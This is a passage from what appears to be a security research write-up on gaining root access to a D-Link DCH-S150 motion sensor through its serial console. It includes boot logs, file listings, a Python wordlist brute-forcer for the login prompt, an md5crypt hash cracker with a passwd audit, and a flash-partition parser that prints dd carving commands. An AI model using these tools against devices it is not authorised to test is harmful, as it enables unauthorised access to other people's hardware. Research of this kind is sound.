Lan Center(199) : Recive a request(102) from 169
Control Center(169) : Recive a request(409) from 199
Application Center(203) : Recive a request(409) from 169
Control Center(169) : Recive a response(409) from 203
Control Center(169) : Recive a request(410) from 199
Application Center(203) : Recive a request(410) from 169
Control Center(169) : Recive a request(414) from 199
Control Center(169) : Recive a request(8) from 199
DCHC Center(205) : Recive a request(3008) from 169
Application Center(203) : Recive a request(414) from 169
Control Center(169) : Recive a response(410) from 203
Control Center(169) : Recive a response(3008) from 205
Failed to kill daemon: No such file or directory
Lan Center(199) : Recive a response(409) from 169
Lan Center(199) : Recive a response(410) from 169
Lan Center(199) : Recive a response(414) from 169
Lan Center(199) : Recive a response(8) from 169
Control Center(169) : Recive a request(10) from 199
Lan Center(199) : Recive a response(10) from 169
Control Center(169) : Recive a response(102) from 199
Control Center(169) : Recive a response(414) from 203
Application Center(203) : Recive a request(424) from 169
killall: dch_scheduler: no process killed
Control Center(169) : Recive a response(424) from 203
Application Center(203) : Recive a request(419) from 169
killall: you need to specify whom to kill
Control Center(169) : Recive a response(419) from 203
Application Center(203) : Recive a request(421) from 169
killall: chkfwd: no process killed
Control Center(169) : Recive a response(421) from 203
Application Center(203) : Recive a request(426) from 169
killall: linkd: no process killed
killall: linkd.out: no process killed
Control Center(169) : Recive a response(426) from 203
Application Center(203) : Recive a request(417) from 169
killall: mdns-scan: no process killed
Control Center(169) : Recive a response(417) from 203
killall: crond: no process killed
Jan  3 00:00:24 crond[481]: crond: crond (busybox 1.21.1--LSDK-10.1.432) started, log level 8
Successfully iniieee80211_ioctl_getparam : parameter 0x284 not supported
tialized wpa_supplicant
Control Center(169) : Recive a response(211) from 201
Configuration fi ieee80211_ioctl_siwmode: imr.ifm_active=131712, new mode=3, valid=1
le: /var/etc/oob DEVICE IS DOWN ifname=ath0
.ap_bss
 DEVICE IS DOWN ifname=ath0
ath0: Could not connect to kernel driver
Using interface ath0 with hwaddr 06:12:f5:1c:8e:4c and ssid 'DCH-S150-8E4C'
br0: port 1(ath0) entering learning state
br0: port 1(ath0) entering forwarding state
ath_tx_edma_tasklet: TXQ[3] tailindex 2
Jan  3 00:01:01 crond[481]: crond: USER root pid 541 cmd dch_scheduler mdns_watchdog
Jan  3 00:01:01 crond[481]: crond: USER root pid 547 cmd dch_scheduler webserver_watchdog
Jan  3 00:01:01 crond[481]: crond: USER root pid 553 cmd dch_scheduler ntp_watchdog
Control Center(169) : Recive a request(418) from 554
Application Center(203) : Recive a request(418) from 169
killall: you need to specify whom to kill
ntp1.dlink.com: Unknown host
Control Center(169) : Recive a response(418) from 203

starting pid 170, tty '/dev/ttyS0': '/bin/login'
MotionSensorDLink login: adm

/ $ ls /bin
ash            echo           ln             mv             sleep
busybox        ethreg         login          pidof          stat
cat            getopt         ls             ping           sync
chmod          grep           md             ping6          tar
cp             gzip           mkdir          ps             touch
date           hostname       mknod          rm             umount
dd             hush           mm             sed            uname
df             iperf3         more           setserial      vi
dnsdomainname  kill           mount          sh

/ $ ls /sbin
arp           halt          klogd         poweroff      syslogd
avahi-daemon  ifconfig      logread       reboot        udhcpc
blkid         init          lsmod         rmmod         zcip
fdisk         insmod        mdev          route

/ $ ls /usr/sbin
arping          fping           iwconfig        telnetd       
brctl           fping6          iwlist          tftpd
crond           hostapd         iwpriv          udhcpd
dhcprelay       hostapd_cli     rdate           wd_keepalive
fakeidentd      inetd           rdev            wpa_cli

/ $ ls /usr/bin
[                     dumpleases            run_migrate
[[                    exec_policy_action    scan_network
aes_alpha             factory_reset         send_dchc_event
app_center            find                  sqlite3
bundle_counter        free                  tail
ccrypt                fw_upgrade            test
chkfwd                fw_verify             top
config2flash          head                  tr
config_header         killall               tty
control_center        lan_center            update_chome
cut                   lighttpd              uptime
dch_scheduler         logger                wc
dchc_center           lsusb                 wget
delay_reboot          md5sum                wifi_center
dirname               mdns-scan             wifi_client_notifier
dlink_time_sync       nslookup              wlanconfig
du                    ntpclient             xargs

Live-Analysis

With this method the Linux login prompt is usually the only obstacle, since it is what denies access to the live system. Common root passwords should be tried first, followed by other common usernames such as admin. To automate the guessing, a small Python script was written that runs a wordlist attack over the serial connection; a simplified version is shown below. If the password cannot be guessed, the detour via the firmware image remains, provided the image can be obtained, either by download or by reading it out of the flash chip. The image contains the password hash, which can then be processed with the usual password cracking techniques and tools. In this case the system has a password-protected root user, but also several other users without a password, which can be used to get a shell and read the root password hash. Guessing or cracking is not always necessary: some devices drop straight into a root shell without any password prompt, and some developers replace the standard Linux login with their own debugging application.

The script is nothing fancy and, because of the delay the login program enforces after every failed attempt, very slow, but it is useful when there is no faster way to obtain the password or its hash. It has to be adapted to each device: the login prompt messages that appear on the console during the login process have to be entered into the script, which then scans the console output for those messages and answers them until either the password is found or the wordlist is exhausted.

bruteforce_unix_login_over_serial.py
#!/usr/bin/env python3
# Wordlist attack against a Linux login prompt over a serial console.
# Usage: bruteforce_unix_login_over_serial.py WORDLIST
# The prompt strings in `messages` must be adapted to the target device
# (e.g. "DCH-G020 login:" for the hub); they are matched as substrings of
# each console line. A candidate counts as correct when the device does not
# answer "Login incorrect" within ATTEMPT_TIMEOUT seconds.
import sys
import time
import serial

# Configuration
PORT = "/dev/ttyAMA0"      # UART adapter wired to the device's serial header
BAUDRATE = 115200
ATTEMPT_TIMEOUT = 60       # seconds without "Login incorrect" = success
un = "root"
pw = None

ser = serial.Serial(
    port=PORT,
    baudrate=BAUDRATE,
    parity=serial.PARITY_NONE,
    stopbits=serial.STOPBITS_ONE,
    bytesize=serial.EIGHTBITS,
    timeout=0.02,          # prompts carry no newline; readline returns on timeout
)

# Business logic
def getMsg():
    return ser.readline().decode(errors="replace").strip()

def enter():
    # A bare newline makes login re-issue its prompt
    ser.write(b"\n")
    return 0

def sendUN():
    ser.write((un + "\n").encode())
    return 1

def sendPW():
    ser.write((pw + "\n").encode())
    return 2

def failed():
    return 3

# Console messages (substrings) and the handler that answers them. Unknown
# lines are ignored rather than answered with a newline, so that no stray
# input is queued while login is still processing the previous attempt.
messages = {
    "login:": sendUN,
    "Password:": sendPW,
    "Login incorrect": failed,
}

def trypw():
    """Try the current pw once; True if it was not rejected in time."""
    deadline = time.time() + ATTEMPT_TIMEOUT   # fresh deadline per candidate
    enter()
    while True:
        msg = getMsg()
        for text, func in messages.items():
            if text in msg:
                if func() == 3:
                    return False
                break
        if time.time() > deadline:
            return True

# Main code
if len(sys.argv) != 2:
    sys.exit("usage: %s WORDLIST" % sys.argv[0])
with open(sys.argv[1], errors="replace") as f:
    for line in f:
        pw = line.rstrip("\r\n")
        if trypw():
            print("password found:", pw)
            break

# Teardown
ser.close()
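
The firmware detour described above ends with an offline attack on the password hash taken from the extracted root filesystem. The following script is an added example and not code from the original article: it parses a BusyBox-style /etc/passwd, flags accounts that log in without a password (as adm does on both consoles above) or are uid-0 aliases of root, classifies each hash by its prefix and runs a small wordlist against an md5crypt ($1$) hash. md5crypt is implemented with hashlib because Python's crypt module was removed in 3.13. The passwd content, the salt, the password "dlink" and the wordlist are all constructed for the example; the root hash is generated in the script itself so that the run is self-contained. On a real target one would hand the hash to hashcat or John the Ripper, but the check is the same.

```python
import hashlib

_ITOA64 = b"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

def _to64(value, count):
    # crypt(3) base64: 6 bits at a time, least significant group first
    return bytes(_ITOA64[(value >> (6 * k)) & 0x3F] for k in range(count))

def md5crypt(password, salt):
    """FreeBSD/GNU md5crypt ($1$), the scheme common on BusyBox-era devices."""
    pw, salt_b, magic = password.encode(), salt.encode()[:8], b"$1$"
    alt = hashlib.md5(pw + salt_b + pw).digest()
    ctx = hashlib.md5(pw + magic + salt_b)
    for i in range(len(pw), 0, -16):          # len(pw) bytes of alt
        ctx.update(alt[:min(i, 16)])
    i = len(pw)
    while i:                                  # one byte per bit of len(pw)
        ctx.update(b"\0" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()
    for i in range(1000):                     # fixed 1000 stretching rounds
        c = hashlib.md5(pw if i & 1 else final)
        if i % 3:
            c.update(salt_b)
        if i % 7:
            c.update(pw)
        c.update(final if i & 1 else pw)
        final = c.digest()
    order = ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5))
    enc = b"".join(_to64(final[a] << 16 | final[b] << 8 | final[c], 4) for a, b, c in order)
    return (magic + salt_b + b"$" + enc + _to64(final[11], 2)).decode()

def parse_passwd(text):
    """name:hash:uid:gid:gecos:home:shell -> list of dicts."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"malformed passwd line: {line!r}")
        name, pwhash, uid, gid, _gecos, home, shell = fields
        entries.append({"name": name, "hash": pwhash, "uid": int(uid), "home": home, "shell": shell})
    return entries

def classify(pwhash):
    """What the password field holds, judged by prefix and shape."""
    if pwhash == "":
        return "empty"        # login without any password prompt
    if pwhash == "x":
        return "shadowed"     # hash lives in /etc/shadow
    if pwhash[0] in "*!":
        return "locked"
    kinds = {"$1$": "md5crypt", "$5$": "sha256crypt", "$6$": "sha512crypt", "$2": "bcrypt"}
    for prefix, kind in kinds.items():
        if pwhash.startswith(prefix):
            return kind
    return "descrypt" if len(pwhash) == 13 and "$" not in pwhash else "unknown"

def audit(entries):
    """Findings to act on before any cracking: free logins and root aliases."""
    no_shell = ("/bin/false", "/sbin/nologin", "/usr/sbin/nologin")
    findings = []
    for e in entries:
        if classify(e["hash"]) == "empty" and e["shell"] not in no_shell:
            findings.append(f"{e['name']}: no password, interactive shell {e['shell']}")
        if e["uid"] == 0 and e["name"] != "root":
            findings.append(f"{e['name']}: uid 0, root-equivalent")
    return findings

def crack_md5crypt(pwhash, candidates):
    """First candidate whose md5crypt under the hash's salt matches, else None."""
    if classify(pwhash) != "md5crypt":
        raise ValueError("not an md5crypt hash")
    salt = pwhash.split("$")[2]
    for cand in candidates:
        cand = cand.rstrip("\r\n")
        if md5crypt(cand, salt) == pwhash:
            return cand
    return None

# Constructed sample, not the passwd file of either device: root carries an
# md5crypt hash of a deliberately weak password (generated here so the run is
# self-contained), adm logs in without a password as seen on both consoles,
# nobody is locked.
ROOT_HASH = md5crypt("dlink", "Qs8fN3pK")
SAMPLE_PASSWD = f"""\
root:{ROOT_HASH}:0:0:root:/root:/bin/sh
adm::500:500:adm:/adm:/bin/sh
nobody:*:99:99:nobody:/:/bin/false
"""
WORDLIST = ["admin", "password", "12345678", "dlink", "root"]   # constructed mini list

if __name__ == "__main__":
    entries = parse_passwd(SAMPLE_PASSWD)
    for e in entries:
        print(f"{e['name']:<8} {classify(e['hash'])}")
    print(*audit(entries), sep="\n")
    print("root hash cracked ->", crack_md5crypt(ROOT_HASH, WORDLIST))
```

The audit step matters more than the cracking: an account with an empty password field and an interactive shell, which is exactly what adm turned out to be here, is a foothold that costs nothing, and from that shell the real passwd file can be read and fed to the cracker.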

Once privileged access to the Linux shell has been obtained, the system as a whole can be examined: configuration files, binaries, running services, flash layout and other system properties.
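
The `mtdparts=` argument in the kernel command line above is the flash layout, and it is what one needs to carve the root filesystem out of a chip dump or to pick the right /dev/mtdblockN once on the shell (the live system exposes the same table in /proc/mtd). The following parser is an added example, not from the original article; it applies the kernel's cmdlinepart rules (a partition without an explicit @offset starts where the previous one ended, '-' means the rest of the device), checks the result against the 8 MB flash reported by U-Boot, lists the meta-partitions that span others, and prints dd commands for a dump file named flash.bin, which is an assumed name.

```python
import re
from dataclasses import dataclass

# Taken from the "Kernel command line:" line of the DCH-S150 boot log above.
MTDPARTS = ("ath-nor0:64k(u-boot),64k(ART),64k(MP),64k(config),64k(log),"
            "896k(bk_uImage),1536k(bk_rootfs),896k(uImage),4032k(rootfs),"
            "2432k@0x50000(bk_firmware),4928k@0x2b0000(firmware),"
            "512k@0x780000(mydlink)")
FLASH_SIZE = 8 * 1024 * 1024          # "Flash:  8 MB" in the U-Boot banner

_UNIT = {"": 1, "k": 1024, "m": 1024 ** 2, "g": 1024 ** 3}
# <size>[@<offset>](<name>)[ro|lk]; size may be '-' for "rest of the device"
_PART = re.compile(r"^(-|0x[0-9a-f]+|\d+)([kmg]?)(?:@(0x[0-9a-f]+|\d+))?\(([^)]*)\)(ro|lk)*$", re.I)


@dataclass
class Partition:
    index: int          # becomes /dev/mtdN and /dev/mtdblockN
    name: str
    offset: int
    size: int

    @property
    def end(self):
        return self.offset + self.size

    def contains(self, other):
        return self is not other and self.offset <= other.offset and other.end <= self.end


def parse_mtdparts(spec, flash_size):
    """Return (device, [Partition]) using the kernel's cmdlinepart rules."""
    device, sep, body = spec.partition(":")
    if not sep:
        raise ValueError("expected <mtd-id>:<partdef>[,<partdef>]")
    parts, cursor = [], 0
    for index, token in enumerate(body.split(",")):
        m = _PART.match(token)
        if not m:
            raise ValueError(f"bad partition definition: {token!r}")
        size_s, unit, off_s, name, _flags = m.groups()
        offset = int(off_s, 0) if off_s else cursor
        size = flash_size - offset if size_s == "-" else int(size_s, 0) * _UNIT[unit.lower()]
        if offset + size > flash_size:
            raise ValueError(f"{name} ends at {offset + size:#x}, beyond flash size {flash_size:#x}")
        parts.append(Partition(index, name, offset, size))
        cursor = offset + size
    return device, parts


def overlaps(parts):
    """(outer, inner) pairs where one partition fully contains another."""
    return [(a.name, b.name) for a in parts for b in parts if a.contains(b)]


def dd_commands(parts, dump="flash.bin"):
    """dd invocations carving each partition out of a raw dump (assumed filename)."""
    cmds = []
    for p in parts:
        bs = 65536 if p.offset % 65536 == 0 and p.size % 65536 == 0 else 1
        cmds.append(f"dd if={dump} of={p.name}.bin bs={bs} skip={p.offset // bs} count={p.size // bs}")
    return cmds


if __name__ == "__main__":
    device, parts = parse_mtdparts(MTDPARTS, FLASH_SIZE)
    print(f"{device}: {len(parts)} partitions")
    for p in parts:
        print(f"mtd{p.index:<3} {p.offset:#010x}-{p.end:#010x} {p.size // 1024:>5}k  {p.name}")
    for outer, inner in overlaps(parts):
        print(f"note: {outer} contains {inner}")
    print("\n".join(dd_commands(parts)))
```

Two values in the log cross-check the result: the kernel's own MTD table prints the same offsets, and root=31:08 is major 31 (mtdblock) minor 8, i.e. the rootfs partition, while the /dev/mtdblock11 mounted on /dch is the writable JFFS2 mydlink partition. bk_firmware and firmware are aliases over the kernel+rootfs pairs, so a dump of firmware alone contains both the uImage and the squashfs; carving rootfs separately yields the image that unsquashfs unpacks.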

Hardware

References